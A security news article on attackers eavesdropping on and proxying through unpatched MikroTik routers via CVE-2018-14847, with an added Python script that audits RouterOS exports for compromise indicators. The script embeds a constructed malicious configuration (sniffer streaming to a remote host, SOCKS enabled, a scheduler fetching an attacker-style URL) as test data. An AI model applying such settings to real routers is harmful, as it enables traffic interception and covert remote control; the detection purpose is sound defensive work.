MikroTik Routers Targeted in Data Eavesdropping Scheme
Researchers: Attackers Continue to Meddle With Hundreds of Thousands of MikroTik Routers
Unknown attackers are intercepting every piece of data handled by more than 7,500 routers made by MikroTik, while also using another 239,000 compromised routers to serve as proxies, according to new research from 360's Network Security Research Lab.
The finding is the latest bad news centering on poorly secured internet of things devices, as attackers have continued to pound routers built by MikroTik. The manufacturer, based in Latvia, issued a patch in April for the vulnerability, designated CVE-2018-14847. But despite warnings from researchers and MikroTik, hundreds of thousands of routers remain unpatched and internet-connected. And attackers have come calling.
The vulnerability in the router can be used to gain access to Winbox, a simple GUI administration utility for MikroTik's RouterOS, as well as to Webfig, the web-based version of the utility. Successfully exploiting the vulnerability gives an attacker complete access to the router. A write-up showing how the vulnerability can be exploited was posted by Alireza Mosajjal of Iran's computer emergency readiness team, BASU CERT.
Attackers often hunt for poorly protected routers because such devices can be used to launch massive distributed denial-of-service attacks or to spy on anyone who uses them. For a subset of vulnerable MikroTik router operators, researchers warn that attackers do appear to be recording all web traffic.
"We ... discovered that more than 7,500 victims are being actively eavesdropped [on], with their traffic being forwarded to IPs controlled by unknown attackers," researchers at 360's Network Security Research Lab write.
In these cases, the researchers note that attackers have been employing a feature built into RouterOS that enables anyone with administrator access to forward all packets to another destination.
Many more of the routers have been turned into proxies using the SOCKS4 internet client/server protocol, the researchers say. About 239,000 IPs attached to MikroTik routers are running a SOCKS4 proxy that has been maliciously activated. If the router is rebooted, "the device is configured to run a scheduled task to periodically report its latest IP address by accessing a specific attacker's URL," the researchers write. "It is hard to say what the attacker is up to with this many SOCKS4 proxies but we think this is something significant."
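The three indicators the researchers describe (packet-sniffer streaming to a remote host, a SOCKS proxy that has been switched on, and a scheduler entry that periodically fetches an attacker-controlled URL) all show up as plain settings in a RouterOS configuration export. The following audit script is an added example, not code from the article or from MikroTik: it parses the text of a `/export` dump and flags those three settings. The export excerpt, the address 192.0.2.10, the port and the URL `http://example.invalid/poll` are all constructed sample values.

```python
"""Audit a RouterOS '/export' text dump for the three settings the 360 Netlab
write-up associates with compromised routers: sniffer streaming to a remote
server, an enabled SOCKS proxy, and a scheduler job that fetches a URL.
Added example; the export below is constructed, not a real device's config."""
import re

# Constructed sample export: a sniffer streaming session, SOCKS switched on,
# and a scheduler entry whose on-event script calls /tool fetch on a URL.
SAMPLE_EXPORT = """\
# constructed sample export
/interface ethernet
set [ find default-name=ether1 ] name=wan
/tool sniffer
set filter-ip-protocol=tcp streaming-enabled=yes streaming-server=192.0.2.10
/ip socks
set enabled=yes port=4153
/system scheduler
add interval=10m name=report on-event="/tool fetch url=\\"http://example.invalid/poll\\" mode=http" \\
    policy=read,write,policy,test start-time=startup
"""


def parse_export(text):
    """Group each 'set'/'add' line under its menu path (e.g. '/ip socks'),
    after joining backslash-newline continuations into single lines."""
    text = re.sub(r"\\\n\s*", " ", text)
    sections = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            current = line
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def kv(line):
    """Extract key=value pairs; values may be double-quoted and may contain
    escaped quotes (as the on-event script does)."""
    pairs = {}
    for m in re.finditer(r'(\S+?)=("(?:[^"\\]|\\.)*"|\S+)', line):
        key, val = m.group(1), m.group(2)
        if val.startswith('"'):
            val = val[1:-1].replace('\\"', '"')
        pairs[key] = val
    return pairs


def audit(text):
    """Return a list of human-readable findings for the indicators above."""
    findings = []
    sections = parse_export(text)
    # Eavesdropping: the built-in sniffer forwarding packets to another host.
    for line in sections.get("/tool sniffer", []):
        p = kv(line)
        if p.get("streaming-enabled") == "yes":
            findings.append(f"sniffer streaming to {p.get('streaming-server', '?')}")
    # Proxy abuse: SOCKS is off by default; enabled=yes deserves a look.
    for line in sections.get("/ip socks", []):
        p = kv(line)
        if p.get("enabled") == "yes":
            findings.append(f"SOCKS proxy enabled on port {p.get('port', '?')}")
    # Persistence: a scheduled job that reports back by fetching a URL.
    for line in sections.get("/system scheduler", []):
        p = kv(line)
        event = p.get("on-event", "")
        if "fetch" in event and "url=" in event:
            url = re.search(r'url="?([^"\s]+)', event)
            target = url.group(1) if url else event
            findings.append(f"scheduler '{p.get('name', '?')}' fetches {target}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_EXPORT):
        print("FINDING:", finding)
```

Run it against the output of `/export` copied from a router (or feed the text in from a backup repository) and treat any finding as a prompt to compare the setting with what the operator actually intended; a SOCKS proxy or a fetch job is not malicious in itself, but the combination on a router nobody configured that way matches the pattern the researchers describe.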
By the researchers' count, there are 370,000 MikroTik routers in the wild that have the CVE-2018-14847 flaw and are thus still vulnerable to being easily compromised.
"We strictly followed the Winbox communication protocol to make sure those devices are indeed MikroTik routers, and to verify if the device has been hacked and what the hacked box is [doing]," the researchers write.
Most of the affected routers are in Russia and Brazil, they say. Other countries with notable numbers of hacked routers include Indonesia, India, Iran, Italy, Poland, the United States, Thailand and Ukraine.
This isn't the first time that researchers have warned that MikroTik routers are being compromised by attackers (see Hacked MikroTik Routers Serve Cryptocurrency-Mining Malware).
Victims are usually unaware that their PC has been pressed into service via this type of cryptomining attack, although it does cause CPUs to work harder and consumes extra electricity.
The researchers, reviewing the attack campaign, note that attackers attempted to redirect all HTTP proxy requests on an infected site to an HTTP 403 error page that would inject Coinhive. "By doing this, the attacker hopes to perform web mining for all the proxy traffic on the users' devices," the researchers say.
But it's not clear how successful these attacks might have been. Notably, the external resources needed for mining "are blocked by the proxy ACL [access control lists] set by the attackers themselves," the researchers write.